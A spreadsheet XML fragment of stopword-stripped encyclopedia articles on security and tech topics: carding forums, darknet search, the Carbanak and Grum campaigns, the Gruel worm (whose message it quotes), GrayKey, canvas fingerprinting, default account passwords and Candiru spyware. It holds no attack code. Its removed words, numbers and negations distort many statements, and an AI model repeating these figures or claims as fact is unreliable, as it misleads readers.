stated potential downside goldback premium goldback costs spot price gold embedded within note. potential counter critique, purchasing power goldback generally found remain constant, cost terms) recouped stable purchasing power spent. example, spends $4.00 single goldback, later proceeds spend goldback merchant also accepts goldbacks, goldback command purchasing power approximately $4.00 initial purchase date, subsequent spend date, close enough time major deflation—or similarly rare event—has caused price gold either rise collapse). also references</t>
  </si>
  <si>
    <t>Google Account</t>
  </si>
  <si>
    <t>google account user account required access, authentication authorization certain online google services. also often used single sign third party services. usage google account required gmail, google hangouts, google meet blogger. some google products require account, including google search, youtube, google books, google finance google maps. however, account needed uploading videos youtube making edits google maps. youtube blogger maintain separate accounts users registered services google acquisition. however, effective april 2011 youtube users required link separate google account wish continue service.google account users create publicly accessible google profile, configure presentation google products google users. google profile linked user's profiles various social-networking image-hosting sites, well user blogs. third-party service providers implement service authentication google account holders google account mechanism. security while creating google account, users asked provide recovery email address allow reset password forgotten account hacked. countries, united states, united kingdom india, google also require one-time mobile phone number send account validation code text messaging voice message creating account.google also offers two-step verification option—for additional security hacking—that requests validation code time user logs google account. code either generated application ("google authenticator" similar apps) received google text message, voice message, email another account. trusted devices "marked" skip 2-step log-on authentication. when feature switched software cannot provide validation code (e.g. imap pop3 clients) must unique 16-character alphanumeric password generated google instead user's normal password.users seek even higher level security protection, including users whose accounts could attractive targets hackers, celebrities, politicians, journalists, political activists wealthy individuals, opt-in google's advanced protection program. this program requires user purchase keys data storage, identity verification. keys used provide two-step verification login. backup purposes, case first lost. advanced protection program includes security measures protect user's account, restrictions applications user grant access account, thorough identity verification process regaining access account password forgotten.on june 2012, security feature introduced protect users state-sponsored attacks. whenever google analysis indicate government attempted compromise account, notice displayed reads "warning: believe state-sponsored attackers trying compromise account computer." activity tracking tool called activity' launched 2016 supersedes google search history google history enables users delete data tracked google google account. tool shows websites visited using chrome logged devices used, apps used, google products interacted with, etc. information laid timeline-like layout. users choose entirely disable tracking, remove certain activities want tracked. account blocking google block account various reasons, "unusual activity" entering "not enough" google account. reactivation possible using web-forms, providing proof identity valid photo credit card payment us$0.30. other methods (such sending uploading requested document) require human interaction take "days couple weeks" accomplished. also apple facebook platform: authentication microsoft account openid references external links official website</t>
  </si>
  <si>
    <t>Carder.su</t>
  </si>
  <si>
    <t>carder.su crime forum online marketplace specialising sale credit card details identity theft. since 2007, operation open market, operation united states secret service targeted site, believed based vegas us.in 2011, alleged major vendor credit card dumps prominent carder.su member, roman seleznev, apprehended maldives enforcement.in 2012, identity thief david camez arrested charged everyone else unprecedented rico legislation.in early 2012, american cash-out master level carder cameron "kilobit" harrison people indicted r.i.c.o. statute arrested buying selling hacked otherwise compromised card details carder.su. november 2014, kilobit (cameron harrison) sentenced months federal prison ordered $50.8 million restitution rejecting refusing plea deals offered government. release date 02/19/2021. january 2015 macedonian jordan georgievski arrested relation site.in march 2015 department state issued reward information leading arrest mid-level leader konstantin lopatin, "graf" leader roman olegovich zolotarev. references external links https://www.justice.gov/sites/default/files/usao-nv/legacy/2013/05/23/open%20market%20indictment%2012-cr-00084.pdf https://www.justice.gov/sites/default/files/usao-nv/legacy/2013/05/23/open%20market%2013-cr-00120%20indictment.pdf https://www.justice.gov/sites/default/files/usao-nv/legacy/2013/05/23/12-04%20indictment.pdf https://www.justice.gov/sites/default/files/usao-nv/legacy/2013/05/23/omar%20butt%2012-83%20indictmentpdf.pdf</t>
  </si>
  <si>
    <t>Graduated response</t>
  </si>
  <si>
    <t>graduated response (also known three strikes) protocol law, adopted several countries, aimed reducing unlawful file sharing. response online copyright infringement, creative industries, reliant copyright, advocate "graduated response" sees infringers sent series notifications, warning alleged infringed copyright, plus additional information secure internet connection details legal alternatives. repeat-infringers risk intermediate technical measures bandwidth reduction, protocol blocking and, worst-case scenario, temporary access suspension. content industry gained co-operation internet service providers (isps), asking provide subscriber information addresses identified third parties engaged copyright infringement. early developments content industry's proposal internet service providers throttle, temporarily suspend, disconnect internet access subscriber received three warning letters alleged copyright infringement initially known "three strikes", based baseball rule "three strikes out". because "three strikes" understood refer physical assault, approach later termed "graduated response". media attention focused attempts implement approach france though initiative, variations implemented number countries, attempts made so.in number european countries early attempts implement graduated response court cases establish circumstances provide subscriber data content industry. order pursue download copyrighted material individual committing infringing must identified. internet users often identifiable internet protocol address address), distinguishes virtual location particular computer. many isps allocate pool addresses needed, rather assigning computer never-changing static address. using subscriber information content industry thought remedy copyright infringement, assuming isps legally responsible user activity, therefore commuting offence, user responsible illegal activity connected address. commit crime, could sentenced years incarceration.in 2005 dutch court ordered isps netherlands divulge subscriber information dutch content industry group collected addresses (foundation netherlands). according dutch isps ordered provide personal subscriber data plausible unlawful occurred, shown beyond reasonable doubt subscriber information identify person committed infringing act. germany court specifically considered right privacy march 2008 german federal constitutional court ruled isps could give address subscription information case "serious criminal investigation". court furthermore ruled copyright infringement qualify serious enough offense. subsequently, april 2008, bundestag (german parliament) approved requiring isps divulge identity suspected infringers infringe commercial scale. spain spanish supreme court recently ruled personal data associated address could disclosed course criminal investigation public safety reasons (productores música españa telefónica españa sau). italy courts established criminally liability extend file sharing copyrighted material, long done commercial gain. ruling case involving copyright holder employed third party collect addresses suspected copyright infringers, italian data protection authority ruled february 2008 systematic monitoring peer-to-peer activities purpose detecting copyright infringers suing allowed. approach according barry sookman glover, main characteristics initiatives are: "rights holders monitor networks illegal downloading activities" "rights holders provide isps convincing proof infringements committed individual given address" "educational notices sent account holder informing infringements consequences continued infringement informing user content lawfully acquired online" account holder repeatedly ignores notices, tribunal take deterrent action, severe sanctions reserved court" reception british consumers' association named "which?" favours initiative, calling measures "proportionate". some consumer rights groups argued graduated response denies consumers right fair trial right privacy. graduated response laws france france president nicolas sarkozy backed proposal implement graduated response french government passed three strikes policy hadopi law.a survey agency responsible implementing suggested approach positive effect behaviour. "the report claims french believe hadopi positive initiative, runs contrary many press reports claiming french overwhelmingly rejected law. half respondents survey also said hadopi motivated access online content 'more often legally.' people personally received hadopi warning knew someone said either ended reduced illegal downloading."an academic study researchers wellesley college carnegie mellon university found public awareness initiative corresponds increase french itunes sales, higher european country period. accounting fact independent variable terms, estimates indicate itunes track sales units rose 25.5% control group march 2009 france, indicating french itunes track sales 22.5% higher average would absence hadopi. similarly, album sales units rose control group france, indicating hadopi increased itunes album sales average week france. however, writing monde, damien leloup jeremiah baruch attribute decline digital piracy sales increase introduction iphone. consequently, co-authors study examined sales data various devices, including iphone, found "the change device penetration france 2008 2009 nearly change penetration control countries, anything change device penetration smaller france control countries measured 2008 2010." reasons seems unlikely device sales could driven disproportionate increase french itunes sales" continue believe data provide compelling empirical evidence hadopi made difference french music sales." zealand zealand first countries enact three strikes policy, implementation delayed month pending development code practice. revealed instrumental implementation policy. south korea south korea adopted graduated response system july 2009. article 133bis korean copyright allows korean copyright commission recommend isps suspend accounts repeat file sharing offenders adjudged commission) months. however, users' email accounts suspended. united kingdom january 2009 british government announced plans legislate graduated response system digital economy 2010. report entitled digital britain government includes plans mandatory "code" isps follow, well creation government "rights agency" help stakeholders deal issue "civil copyright". under proposed scheme government would legislate "code unlawful file-sharing" that's isps would follow would establish "appeals standards evidence". passed law. voluntary graduated response ireland attempts ireland implement three strikes number isps resulted court proceedings, latest concerned data protection issues. only still using effect. united states 2011, consortium known center copyright information established voluntary graduated response scheme known copyright alert system. copyright alert system abandoned january 2017. effects graduated response laws 2014, academic research paper copyright academic rebecca giblin examined evidence whether graduated response laws france, zealand, taiwan, south korea, ireland united states achieving aims. found little evidence graduated responses either successful effective. also effects file sharing anti-counterfeiting trade agreement counterfeit digital rights information freedom terrorem legal quality graduated educational notices) secondary liability references</t>
  </si>
  <si>
    <t>Grammarly</t>
  </si>
  <si>
    <t>grammarly cloud-based typing assistant reviews spelling, grammar, punctuation, clarity, engagement, delivery mistakes. uses artificial intelligence identify search appropriate replacement error locates. also allows users customize style, tone, context-specific language. launched 2009 alex shevchenko, lytvyn, dmytro lider. 2018, grammarly launched beta version browser extension, optimized google docs. 2022, available downloaded program desktop applications, browser extension, smartphone keyboard. software produced grammarly inc, headquartered francisco, california, offices kyiv, york city, vancouver. history origins lytvyn, alex shevchenko, dmytro lider founded grammarly years designing program called dropbox, program checked essays plagiarism. initially, grammarly program universities teach students english; however, sales considered slow universities could years time, decided sell product directly user. they started project western world because, according alex shevchenko, "unlike ukrainian universities, western educational institutions open technologies." time, lytvyn shevchenko decided target customers english everyday life, rather english learners. later 2022, ukrainian-founded grammarly said would donate profits made since 2014 russia belarus ukraine 2022 russian invasion ukraine. security early 2018, researcher google discovered "high severity" vulnerability extension grammarly couple major browsers. issue report said "any website login grammarly.com access documents data." after notified vulnerability hours later grammarly released fix. despite severity bug, grammarly maintains found evidence user data compromised.in december 2018, grammarly launched bounty program hackers hackerone platform. since march 2022 grammarly offers dollars first person able access specific certain document server. access method must disclosed collect bounty. reception grammarly criticized incorrect suggestions, ignorance tone context, reduction writers' freedom expression. also duolingo google docs history languagetool references</t>
  </si>
  <si>
    <t>Grams (search)</t>
  </si>
  <si>
    <t>grams discontinued search engine based darknet markets launched april 2014, closed december 2017. service allowed users search multiple darknet markets products like drugs guns simple search interface, also provided capability users hide transactions bitcoin tumbler helix. services used custom scrape listings several markets alpha others, return search listings. site described global drug policy observatory "transformed people search hidden web".in 2014 site added gramwords, service similar google's adwords search sponsorship system vendors. additionally profile system allows cross-market vendor contact details reviews held centrally.later year june creators released grams flow, clearnet redirection service serving various dark sites november, banner advertising network sites, torads much success.'infodesk' allows central content identity management vendors, reducing complexity around maintaining presences multiple markets.on december 2017, grams administrator left signed message reddit subreddit r/grams stating grams services, including helix tumbler, would shut december 2017. helix june 2014, grams released helix helix light, market payment service integrated bitcoin tumbler. site also available clearnet grams flow.in august 2017, noted elaborate darknet phishing scam appeared google search result "how bitcoins", directing users fake version grams helix light website would steal bitcoins.due enduring popularity site, relative ease replicating first digits .onion address, number illegitimate copies original gram hidden service created. these include scam version flow, search engine, even copies drug marketplaces indexed. several competing scams replicated "grams7e" portion address listed links aggregators defunct original site. like helix scam, sites defraud unsuspecting visitors money personal details entered fake site fake marketplaces linked owner february 2020, arrested ohio man, larry dean harmon, alleged operator helix grams. helix said partnered alphabay, illegal darknet market shut mid-2017. harmon pled guilty august 2021 agreed forfeit 4400 bitcoins part plea deal, faces years imprisonment. references</t>
  </si>
  <si>
    <t>Graphical password</t>
  </si>
  <si>
    <t>graphical password graphical user authentication form authentication using images rather letters, digits, special characters. type images used ways users interact vary implementations. content types mechanisms image sequence graphical passwords frequently require user select images particular order respond images presented particular order. image-generated text another graphical password solution creates one-time password using randomly generated grid images. each time user required authenticate, look images pre-chosen categories enter randomly generated alphanumeric character appears image form one-time password. facial recognition system requires users select series faces password, utilizing human brain's ability recall faces easily. draw-a-secret (das) draw-a-secret type graphical password requires user draw picture grid. user must exactly remember user-drawn gestures order authenticated. larger stroke count corresponds increase security since harder attacker copy strokes order performed. weaknesses when used private setting, graphical passwords typically susceptible text-based passwords "shoulder-surfing attacks", attacker learns password watching screen user gains access. references</t>
  </si>
  <si>
    <t>Carbonite, Inc.</t>
  </si>
  <si>
    <t>carbonite, inc. american company offers online backup service, available windows macos users. 2019 acquired canadian software company, opentext. backs documents, e-mails, music, photos, settings. named carbonite, fictional substance used freeze solo star wars: empire strikes back. carbonite first service offer unlimited backup space fixed price. previously, online backup services priced gigabyte; many vendors since changed unlimited model. carbonite offers separate lines products: carbonite home home office individuals, families, one- two-person businesses; carbonite small business businesses three computers.at time history, carbonite named "best windows backup tool" lifehacker, "labs winner" pro, "editor's choice" nextadvisor, received "two mice" macworld review putting second last. product details carbonite online backup installs client software program user’s computer operates continuously background. this client software automatically seeks changed files user’s computer backs using incremental backup. each file compressed encrypted using 128-bit blowfish encryption sent remote servers company's data centers internet. (this course requires user's computer continually connected internet, speed internet connection impact system performance.) data transmitted servers using secure link. encrypted files stored 15-drive raid storage arrays.the program designed automatically back user-generated content including text documents, spreadsheets, financial documents, photos, music, etc. 2017 magazine review found audio files photos omitted backup without obvious reason.videos files larger require manual backup base-priced version. terms allow carbonite release information enforcement upon demand carbonite suspects illegal use. this would help enforcement carbonite give encryption key, windows users. windows users manage selecting "advanced" installation. users cannot make private later initially carbonite manage it.if carbonite manages key, users download files computer. user manages key, user access files backed computer (file explorer/this pc/carbonite drive), computer inaccessible, user must upload carbonite manage accessing backed files another computer.the terms carbonite delete files without notice, normally keep three recent versions, version past week, week weeks that, month months ago. they also delete files deleted user days before, payment ends. carbonite offers telephone support recover ransomware viruses. terms also disclaim warranties damages, require arbitration boston, disallow class action suits. terms require users (indemnify) carbonite's losses relate improper actions user.on windows carbonite backs everything documents settings folder, including desktop, favorites, files except temporary, video files. file folder added default backup local (internal) drive formatted fat32 ntfs file systems. (according carbonite website, home version backup internal drives whereas homeplus homepremium versions also backup external drives.) backup software integrates windows explorer, adding green dots file icons backed file. adding removing files backup done using right mouse button windows context menus. windows version carbonite keep multiple versions backed files.carbonite recover forms ransomware requires contacting carbonite customer service. intel-based macs running 10.4 (tiger) 10.5 (leopard), carbonite controlled system preferences using contextual menu. file systems supported default' supported client exception fat. program also includes remote access application allows individual files downloaded computer using browser. company profile david friend jeff flowers founded carbonite 2005, fifth joint venture pair also together founded computer pictures, pilot software, faxnet sonexis. friend also executive instruments, inc., pioneering electronic music synthesizer manufacturer, 1970s. since launch 2006, carbonite backed billion files restored billion lost files customers.carbonite introduced macintosh version intel-based macs 10.4 10.5 march 2009.in 2017, carbonite acquired mozy, cloud based backup solution dell technologies $145.8 million.in 2019, carbonite acquired webroot, delivers multi-vector cybersecurity protection endpoints networks, well threat intelligence services protect businesses individuals $618.5 million.on november 2019, open text corporation announced signed definitive agreement acquire carbonite inc. $23.00 share cash. open text said plans initiate tender offer within business days, take untendered shares mandatory take provisions applicable legislation, expects transaction close within days, purchase price $1.42 billion inclusive debt equity. history product debuted staples 2006 focused photo backup offered free six-month subscription camera purchases. partnered microsoft 2006 include program purchase microsoft money 2007, renewed following year 2008 edition.in 2007 named ‘top private company’ alwayson 2007.it partnered several backup, storage, file transfer companies: ipswitch, inc. 2007 provide service purchasers client, olbex 2007 offer service u.s. cable companies, sonic solutions 2008 provide core technologies digital media storage solution, telecom 2008 provide core technologies online backup service, lacie 2008,to power online backup. partnered lifeboat distribution 2008, enhance distribution coverage within north america.it partnered packard bell 2008, first partnership independent online backup company major manufacturer, providing purchasers desktop notepad computers europe free four-month subscription. subsequently partnered also lenovo 2008, service pre-loaded pcs, acer online backup service pre-installed select pcs. acer signed similar arrangement 2009.in 2009, admitted loss backups "over 7,500 customers" lawsuit filed promise technology, hardware provider.on june 2011, carbonite acquired phanfare. carbonite declined honor phanfare lifetime memberships, instead granting lifetime members $299 phanfare credit would expire three years unused. days later, phanfare founder ceo, andrew erlichson notified lifetime subscribers customers requesting refund paid carbonite, remains phanfare, inc. funding 2006, secured $2.5 million series financing keiretsu forum commonangels; 2007 completed million series financing menlo ventures. 2008 secured additional million series funding completed round financing approximately million capital, performance equity stamford, connecticut; 2010 closed mezzanine round funding total financing raised million. carbonite made august 2011, raising $62.5 million offering.on 2013, carbonite announced loss full year 2012 ($18.9) million, compared ($23.5) million 2011. since inception 2005, nasdaq:carb lost excess ($120,000,000) public private investment. company's financial reports state: expect continue incur gaap operating losses annual basis foreseeable future". amazon review controversy carbonite reviews amazon subject controversy early 2009. apparently, employees company posted favorable testimonial-style amazon 2006, including senior members management team. additionally, york times reported made aware situation september 2008 nothing remove false postings times blog appeared january 2009. misleading advertising controversy advertising standards authority (asa) united kingdom ruled august 2012, carbonite misled consumers describing online backup unlimited. following complaint, investigated found bandwidth restrictions uploading data, limit upload mbit/s first kbit/s exceeded, backup unlimited. therefore, advert "likely mislead consumers". additionally, carbonite breached rule code failing respond asa's charges.in 2014, carbonite stated eliminated bandwidth throttling customers. releases version (late 2005) carbonite photo backup version (may 2006) carbonite unlimited backup version (february 2007) added support windows vista version (june 2007) added block-level incremental backup launch (2007) online backup service french german version (august 2007) added online backup simplification processes version (january 2008) enhanced user controls saving three months previous file versions launches (2008) dutch, portuguese, spanish japanese versions version (june 2008) improved backup speed large files performance enhancements version (march 2009) user-requested enhancements adds remote file access (2009) launches (2009) carbonite online backup intel-based macs 10.4 10.5 march 2009 version september 2010) releases ipad updates iphone blackberry apps launches (2011) carbonite small business offering also comparison online backup services list backup software (includes managed backup providers) references external links official website business data carbonite, inc.: boston business journal carbonite calls backup: files $100m</t>
  </si>
  <si>
    <t>Carbanak</t>
  </si>
  <si>
    <t>carbanak apt-style campaign targeting (but limited financial institutions, discovered 2014 russian cyber security company kaspersky lab. utilizes malware introduced systems running microsoft windows using phishing emails, used steal money banks macros documents. hacker group said stolen million dollars, banks well thousand private customers. criminals able manipulate access respective banking networks order steal money variety ways. instances, atms instructed dispense cash without locally interact terminal. money mules would collect money transfer swift network criminals’ accounts, kaspersky said. carbanak group went alter databases pump balances existing accounts pocketing difference unbeknownst user whose original balance still intact.their intended targets primarily russia, followed united states, germany, china ukraine, according kaspersky lab. bank lost $7.3 million atms programmed spew cash certain times henchmen would collect, separate firm million taken online platform. kaspersky helping assist investigations countermeasures disrupt malware operations cybercriminal activity. during investigations provide technical expertise analyzing infection vectors, malicious programs, supported command control infrastructure exploitation methods.fireeye published research tracking activities, referring group fin7, including sec-themed spear phishing campaign. proofpoint also published research linking group bateleur backdoor, expanded list targets u.s.-based chain restaurants, hospitality organizations, retailers, merchant services, suppliers others beyond initial financial services focus.on october 2020, prodaft (switzerland) started publishing internal details fin7/carbanak group tools operation. published information claimed originated single opsec failure threat actor’s side.on march 2018, europol claimed arrested "mastermind" carbanak associated cobalt cobalt strike group alicante, spain, investigation spanish national police cooperation enforcement multiple countries well private cybersecurity companies. group's campaigns appear continued, however, hudson's company breach using point sale malware 2018 attributed group. controversy some controversy exists around carbanak attacks, seemingly described several months earlier report internet security companies group-ib (russia) fox-it (the netherlands) dubbed attack anunak. anunak report shows also greatly reduced amount financial losses according statement issued fox-it release york times article, compromise banks outside russia match research. also interview conducted russian newspaper kommersant controversy claims kaspersky group-ib come light group-ib claims banks outside russia ukraine hit, activity outside region focused point sale systems.reuters issued statement referencing private industry notification issued usss (united states secret service) claiming received reports carbanak affected financial sector. representative groups banking industry fs-isac (american bankers association) interview bank technology news banks affected. references</t>
  </si>
  <si>
    <t>Graybird</t>
  </si>
  <si>
    <t>graybird trojan horse hides presence compromised computers downloads files remote sites. there many variations virus backdoor.graybird.p (the recently discovered variation). discovered september 2003 affects windows 2000, windows windows windows windows windows server 2003, windows windows vista. references graybird information provided symantec graybird.p information provided symantec</t>
  </si>
  <si>
    <t>Grayshift</t>
  </si>
  <si>
    <t>grayshift american mobile device forensics company makes device named graykey crack iphones. grayshift co-founded david miles, braden thomas, justin fisher sean larsson. company funded private investors peakequity partners capital. graykey graykey product used u.s., british canadian local police forces. canadian police forces require judicial authorization (court order warrant) mobile phone graykey. graykey estimated used countries.according media reports, graykey costs us$15,000 us$30,000 copy depending functional options chosen. thousand agencies currently graykey device gray box, inches inches inches size, lightning cables. time solve iphone's passcode minutes several hours depending length passcode. thus, possible graykey performing brute-force attack perform solve disabling passcode attempt limit.the graykey reportedly provides support iphones running later. apple modified external device connections must authorized iphone owner unlocked. newer iphone models, unencrypted files metadata might extracted. with earlier models, full data extraction, decrypting encrypted files, possible. 2018, hackers obtained graykey source code attempted extort payment bitcoins grayshift leaking "small chunks code".graykey android support released early 2021. references external links official website</t>
  </si>
  <si>
    <t>Canvas fingerprinting</t>
  </si>
  <si>
    <t>canvas fingerprinting number browser fingerprinting techniques tracking online users allow websites identify track visitors using html5 canvas element instead browser cookies similar means. technique received wide media coverage 2014 researchers princeton university leuven university described paper never forgets. description canvas fingerprinting works exploiting html5 canvas element. described acar when user visits page, fingerprinting script first draws text font size choice adds background colors (1). next, script calls canvas api’s todataurl method canvas pixel data dataurl format (2), basically base64 encoded representation binary pixel data. finally, script takes hash text-encoded pixel data (3), serves fingerprint variations graphics processing unit (gpu), graphics driver, installed cause fingerprint variation. fingerprint stored shared advertising partners identify users visit affiliated websites. profile created user's browsing activity, allowing advertisers target advertise user's inferred demographics preferences.by january 2022, concept extended fingerprinting performance characteristics graphics hardware, called drawnapart researchers. uniqueness since fingerprint primarily based browser, operating system, installed graphics hardware, uniquely identify users. small-scale study participants amazon's mechanical turk, experimental entropy bits observed. authors study suggest entropy could likely observed wild patterns used fingerprint. while sufficient identify individual users itself, fingerprint could combined entropy sources provide unique identifier. claimed technique effectively fingerprinting gpu, entropy "orthogonal" entropy previous browser fingerprint techniques screen resolution browser javascript capabilities.much unique identification becomes possible drawnapart published 2022, shown boost tracking duration individual fingerprints used enhance methods. history 2012, keaton mowery hovav shacham, researchers university california, diego, wrote paper pixel perfect: fingerprinting canvas html5 describing html5 canvas could used create digital fingerprints users.social bookmarking technology company addthis began experimenting canvas fingerprinting early 2014 potential replacement cookies. 100,000 websites used canvas fingerprinting deployed. according addthis richard harris, company used data collected tests conduct internal research. users able install opt-out cookie computer prevent tracked addthis canvas fingerprinting.a software developer writing forbes stated device fingerprinting utilized purpose preventing unauthorized access systems long used tracking users without consent.as 2014 technique widespread many websites, used least dozen high-profile user tracking suppliers.in 2022, capabilities canvas fingerprinting much deepened taking minute differences nominally identical units model account. those differences rooted manufacturing process, making units deterministic time identical copies. mitigation project reference documentation states, "after plugins plugin-provided information, believe html5 canvas single largest fingerprinting threat browsers face today." browser notifies user canvas read attempts provides option return blank image data prevent fingerprinting. however, browser currently unable distinguish legitimate uses canvas element fingerprinting efforts, warning cannot taken proof website's intent identify track visitors. browser add-ons like privacy badger, donottrackme, adblock plus manually enhanced easyprivacy list able block third-party network trackers configured block canvas fingerprinting, provided tracker served third party server opposed implemented visited website itself). canvas defender, browser add-on, spoofs canvas fingerprints.the librewolf browser project includes technology block access html5 canvas default, allowing specific instances green-lit user. also evercookie type browser cookie intentionally difficult delete local shared object persistent browser cookie also known flash cookie storage application software methods protocols used storing data browser references external links https://browserleaks.com/canvas canvas defender multiloginapp.com chrome store canvas defender multiloginapp.com addons.mozilla.org canvas defender multiloginapp.com</t>
  </si>
  <si>
    <t>Gridcoin</t>
  </si>
  <si>
    <t>gridcoin (ticker: grc) open source cryptocurrency securely rewards volunteer computing performed boinc network, distributed computing platform home science projects spanning range scientific disciplines. created october 2013, halförd. gridcoin, like peercoin, uses proof stake protocol attempts address ease environmental impact cryptocurrency mining, compared proof work system used bitcoin.the implementation gridcoin-research created fork bitcoin peercoin licensed license. uses user interface prebuilt executables wallet distributed windows, macos, debian. references external links official gridcoin website</t>
  </si>
  <si>
    <t>Canonical account</t>
  </si>
  <si>
    <t>canonical account built-in account), context computer software systems, account included default program firmware. such accounts usually also default password certain access rights default. accounts password permissions usually common knowledge, given anyone possessing copy software, device documentation likely know account, common security measure change account's password double-check modify groups any) included simply disable delete required. examples zyxel routers typically admin default firmware administration account 1234 default password. password changed soon possible. microsoft windows 2000 possibly versions, account named guest default, password grants basic access operating system. even though disabled default, administrators choose activate change password disable good measure. this account cannot deleted. blank, canonical passwords usually simple often simple sequence: 1234, 4321, abcd account: account bob, password also word relating account software: support, finance, windows simply password, pass references external links default router password list alecto default password list project</t>
  </si>
  <si>
    <t>Gruel (computer worm)</t>
  </si>
  <si>
    <t>gruel (also referred f-secure fakerr) worm first surfaced 2003 targeting microsoft windows platforms (such windows windows windows 2000 windows xp). spreads email file sharing networks. symptoms arrival initial launch worm arrives attachment various names emails claiming security update either microsoft symantec, depending variant. when run, worm installs system displays fake windows error reporting dialog box, user cannot move close contains buttons: "send error" "send close", user clicks "send error" button, worm mass-mails user's contacts displays fictitious "technical details" supposed error report, contains back button close button. clicking back button return original error reporting box, whereas close button anything. when user presses "send close", worm disable terminate windows explorer, eject cd/dvd drive, open many control panel options, display dialogue cannot closed, contains buttons, "retry" "cancel". text error message follows: your computer mine, why? because nothing thought, make evil? remember your power! windows sucks! can't stand anymore! windows always sucked. wake people! it's scam! need faster computer. need better operating system. microsoft continuingly [sic] makes money selling latest greatest windows. latest windows version always inefficient yet, slowing fast computer. also, upgrade software different windows versions compatible other! hidden cost mentioned all. it's part scam. capitalism sucks!, communism sucks. killerguate. secondary payload after carrying payload, virus hangs operating system, requiring users perform hard boot forcibly shutting machine cutting power, turning machine back afterwards, completely unusable, .bat, .com, .exe, .ht, .hta, .pif .scr files hooked virus attempting programs, worm simply activated release primary payload more. also list computer worms references</t>
  </si>
  <si>
    <t>Grum botnet</t>
  </si>
  <si>
    <t>grum botnet, also known alias tedroo reddyb, botnet mostly involved sending pharmaceutical spam e-mails. once world's largest botnet, grum traced back early 2008. time shutdown july 2012, grum reportedly world's third largest botnet, responsible worldwide spam traffic.grum relies types control servers operation. type used push configuration updates infected computers, used tell botnet spam emails send.in july 2010, grum botnet consisted estimated 560,000–840,000 computers infected grum rootkit. botnet alone delivered 39.9 billion spam messages march 2010, equating approximately total global spam volume, temporarily making world's then-largest botnet. late 2010, botnet seemed growing, output increased roughly comparison output 2009 early 2010.it used panel written control botnet. botnet takedown july 2012, malware intelligence company published analysis botnet's command control servers located netherlands, panama, russia. later reported dutch colo/isp soon seized secondary servers responsible sending spam instructions existence made public. within day, panamanian hosting grum's primary servers followed suit shut server. cybercriminals behind grum quickly responded sending instructions newly established servers ukraine. fireeye connected spamhaus, cert-gib, anonymous researcher shut remaining servers, officially knocking botnet. grum botnet zombie clean-up there sinkhole running former addresses grumbot servers. feed sinkhole processed shadowserver abusix inform point contact infected addresses. isp's asked contact customers infections malware cleaned shadowserver.org inform users service abusix sends x-arf (extended version abuse reporting format) report every hour. also botnet malware e-mail spam internet crime internet security references</t>
  </si>
  <si>
    <t>Candiru (spyware company)</t>
  </si>
  <si>
    <t>candiru, today known saito tech aviv-based technology company offering surveillance cyberespionage technology governmental clients.candiru offers cyberespionage tools used infiltrate computers, servers, mobile devices, cloud accounts. specialty appears infiltration computers, particularly running windows os., though recent years company begun developing tools android devices. also effort spent developing macos attacking tools. company described secretive, haaretz describing "one israel’s mysterious cyber warfare companies". website requires employees sign non-disclosure agreements reveal place employment linkedin. company recruits heavily idf's intelligence unit unit 8200.the company named candiru, amazonian parasitic fish notorious apocryphal ability invade parasitise human urethra. company also uses silhouette candiru fish logo. company changes name frequently (most recently saito tech) effort obscure existence. corporate profile overview candiru founded eran shorer yaakov weizman 2014 candiru ltd. chairman largest shareholder isaac zach, also founding funder group. additionally, candiru reportedly financially backed founders group, co-founded omri lavie, also founders groups. candiru thought israel's second-largest cyberespionage company group, suggested candiru seek merge group.the company frequently relocated offices though still known original name candiru also undergone multiple changes registered name (including grindavik solutions, associates, taveta, d.f. associates, greenwick solutions, tabatha, and, finally, saito tech (current registered name)).corporate history candiru founded eran shorer yaakov weizman 2014 candiru ltd.according information court filings lawsuit filed candiru former senior employee, company employees 2015, employees 2018, since grown employees. during first year founding, company clients, beginning 2016, company number deals advanced stage clients europe, former soviet union, persian gulf, asia, latin america. according plaintiff, company grossed million worth sales 2016, nearly million 2017, though figures appear refer multi-year deals. another part lawsuit, plaintiff indicates company's 2018 revenues worth million. document appended lawsuit suggests company negotiations potential clients countries total value $367 million. according information lawsuit provided court defendant (candiru), company collaborates intermediaries target countries help complete deals earn commission services. according plaintiff, candiru senior management decided begin development spyware mobile phones 2017, however, sale marketing phone spyware halted company's chairman early 2018. defendant, candiru complained plaintiff revealed secret security information lawsuit demanded proceedings continue closed hearings information proceedings concealed public.according reporting january 2019, candiru believed employ people generated annual sales million, would make israel's second-largest cyberespionage firm.according reporting december 2019, candiru's market capitalisation million (based sale stake candiru sold venture capitalist wartman universal motors million).candiru reportedly carrying business negotiations singapore (reported 2019), qatar (reported 2020). company linked qatari sovereign wealth fund invested candiru.according report july 2021 citizenlab, candiru’s exploits linked nation-state malware attacks observed uzbekistan, saudi arabia, qatar, singapore, united arab emirates.the cyber firm receives boost investors qatar, several investment funds ties qatar investment authority took stake spyware firm candiru.candiru least subsidiary sokoto incorporated march 2020.as december 2020, company's board members shorer, weitzman, zach, representative universal motors israel (which candiru shareholder). according 2021 filings, largest shareholders shorer, weitzman, zach. other shareholders universal motors israel ltd, esop management trust services, optas industry ltd. history 2019, researcher kaspersky revealed candiru spyware used uzbekistan's intelligence agency. operational security lapses committed uzbek client testing tools various antivirus systems (including kaspersky antivirus) tipped researchers. researchers identified uzbeki test computer uncovered address regularly connected, registered uzbeki national security service. findings subsequently allowed researchers identify candiru's clients: saudi arabia united arab emirates. tracking candiru's infiltration tactics allowed cybersecurity experts identify many eight windows zero-day exploits.in april 2021, london-based publication middle east compromised days, used deploy malicious code onto visitors' devices. many organisation including iranian embassy, italian aerospace companies, syrian yemeni government entities targeted. attack uncovered eset, tied malicious code used attack candiru.according findings joint investigation citizenlab microsoft (report released july 2021), candiru used mock website urls made appear like addresses ngos, activist groups, health organisations, news media organisations ensnare targets. investigation uncovered domains appeared linked candiru. among sham urls ones appeared imitate website publishes israeli court indictments palestinian prisoners, website critical saudi crown prince mohammed salman. findings indicated candiru's cyberespionage tools used target civil society. microsoft identified least targets included politicians, human rights activists, journalists, academics, embassy workers, political dissidents. microsoft identified targets multiple countries across europe asia. candiru's systems found operated multiple countries, including (but limited saudi arabia, israel, u.a.e., hungary, indonesia. investigation commenced citizenlab identified computer suspected hosting persistent candiru infection using telemetry data. citizenlab approached user device politically active individual western europe obtain image device's hard drive.in november 2021, united states commerce department added candiru well group, major israeli spyware vendor) trade blacklist supplying spyware foreign governments used malicious ends, commerce department deemed commercial activities contrary u.s. national security foreign policy interests. u.s. commerce department subsequently sent candiru list questions candiru's spyware operates.in april 2022, citizenlab published report revealed four catalan independence proponents targeted candiru spyware part larger campaign proponents catalan independence (catalangate) mainly conducted using pegasus spyware. targets enticed click link email message sent them, personal computers becoming infected 